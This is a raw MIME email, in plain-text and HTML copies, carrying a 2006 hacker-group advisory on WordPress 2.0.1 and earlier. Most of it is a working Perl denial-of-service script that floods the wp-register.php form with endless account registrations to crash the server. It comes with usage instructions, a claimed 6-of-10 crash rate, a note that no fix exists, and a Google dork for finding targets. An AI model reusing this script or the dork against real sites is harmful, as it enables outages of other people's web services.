------=_Part_5949_11148151.1141837505833 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline ------------------------------------------------------ HYSA-2006-005 h4cky0u.org Advisory 014 ------------------------------------------------------ Date - Wed March 08 2006 TITLE: =3D=3D=3D=3D=3D=3D WordPress 2.0.1 Remote DoS Exploit SEVERITY: =3D=3D=3D=3D=3D=3D=3D=3D=3D Medium SOFTWARE: =3D=3D=3D=3D=3D=3D=3D=3D=3D Wordpress 2.0.1 and prior INFO: =3D=3D=3D=3D=3D WordPress is a state-of-the-art semantic personal publishing platform with = a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the sam= e time. Support Website : http://wordpress.org/ POC: =3D=3D=3D=3D #!perl #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;) #The exploit was tested on 10 machines but not all got flooded.Only 6/10 go= t crashed use Socket; if (@ARGV < 2) { &usage; } $rand=3Drand(10); $host =3D $ARGV[0]; $dir =3D $ARGV[1]; $host =3D~ s/(http:\/\/)//eg; #no http:// for ($i=3D0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :) { $user=3D"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x= 6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! $data =3D "action=3Dregister&user_login=3D$user&user_email=3D$user\@ matrix.org&submit=3DRegister+%C2%BB"; $len =3D length $data; $foo =3D "POST ".$dir."wp-register.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port =3D "80"; my $proto =3D getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+"; } #s33 if the server is down print "\n\n"; system('ping $host'); sub usage { print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n"= ; print "\te-mail: matrix_k\@abv.bg\n"; print "\tusage: \n"; print "\t$0 \n"; print "\tex: $0 127.0.0.1 /wordpress/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n"; exit(); }; FIX: =3D=3D=3D=3D No fix available as of date. GOOGLEDORK: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D "Powered by WordPress" CREDITS: =3D=3D=3D=3D=3D=3D=3D=3D - Exploit coded by matrix_killer of h4cky0u Security Forums Mail : matrix_k at abv dot bg Web : http://www.h4cky0u.org - Co Researcher - h4cky0u of h4cky0u Security Forums. Mail : h4cky0u at gmail dot com Web : http://www.h4cky0u.org ORIGINAL ADVISORY: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt -- http://www.h4cky0u.org (In)Security at its best... ------=_Part_5949_11148151.1141837505833 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline

------------------------------------------------------
  &n= bsp;   HYSA-2006-005 h4cky0u.org Advisory 014
------------------------------------------------------Date - Wed March 08 2006


TITLE:
=3D=3D=3D=3D=3D=3D

WordPress 2.0.1 Remote DoS Exploit


SEVERITY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D

Medium


SOFTWARE:
=3D=3D=3D=3D=3D=3D=3D=3D=3D

Wordpress 2.0.1 and prior


INFO:
=3D=3D=3D=3D=3D

WordPress is a state-of-the-art semantic personal publishing platform wi= th a focus on aesthetics, web standards, and

usability. What a mouthful. WordPress is both free and priceless at the = same time.

Support Website : http://wordpress.org= /


POC:
=3D=3D=3D=3D

#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
= #The exploit was tested on 10 machines but not all got flooded.Only 6/10 go= t crashed

use Socket;

if (@ARGV < 2) { &usage; }

$rand=3Drand(10);
$host =3D $ARGV[0];
$dir =3D $ARGV[1];

$host =3D~ s/(http:\/\/)//eg; #no http://
for ($i=3D0; $i<99999999= 99999999999999999999999999999999999999999999999999999999999999; $i++) #0_o = :)
{
$user=3D"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\= x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data =3D "action=3Dregister&user_login=3D$user&user_email= =3D$user\@matrix.org&submit=3DRegister+%C2%BB";
$len =3D length= $data;
$foo =3D "POST   ".$dir."wp-register.p= hp HTTP/1.1\r\n".
            = ;   "Accept: */*\r\n".
     = ;          "Accept-Langua= ge: en-gb\r\n".
        &nb= sp;      "Content-Type: application/x-www-for= m-urlencoded\r\n".
        =        "Accept-Encoding: gzip, deflate\r= \n".
            = ;   "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows = NT 5.0)\r\n".
         = ;      "Host: $host\r\n".
  = ;             &= quot;Content-Length: $len\r\n".
      = ;         "Connection: Keep-Al= ive\r\n".
            = ;   "Cache-Control: no-cache\r\n\r\n".
 "$= data";

     my $port =3D "80";
  &nb= sp;  my $proto =3D getprotobyname('tcp');
     = socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
     c= onnect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
 &nbs= p;   send(SOCKET,"$foo", 0);
     syswrite STDOUT, "+";
}

#s33 if the server is down
print "\n\n";
system('ping $h= ost');

sub usage {

print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_k= iller\n";
print "\te-mail: matrix_k\@abv.bg\n";
print = "\tusage: \n";
print "\t$0 <host> </dir/>\n&q= uot;;
print "\tex: $0 127.0.0.1 /wordpr= ess/\n";
print "\tex2: $0 127.0.0= .1 / (if there isn't a dir)\n";
exit();
};


FIX:
=3D=3D=3D=3D

No fix available as of date.


GOOGLEDORK:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

"Powered by WordPress"


CREDITS:
=3D=3D=3D=3D=3D=3D=3D=3D

- Exploit coded by matrix_killer of h4cky0u Security Forums

Mail : matrix_k at abv dot bg

Web : http://www.h4cky0u.org


- Co Researcher -

h4cky0u of h4cky0u Security Forums.

Mail : h4cky0u at gmail dot com

Web : http://www.h4cky0u.org


ORIGINAL ADVISORY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D

http://www.h4cky0u.org/advisories/HYSA-2006-005-wordpress.txt


= --
http://www.h4cky0u.org
(In= )Security at its best...=20 ------=_Part_5949_11148151.1141837505833--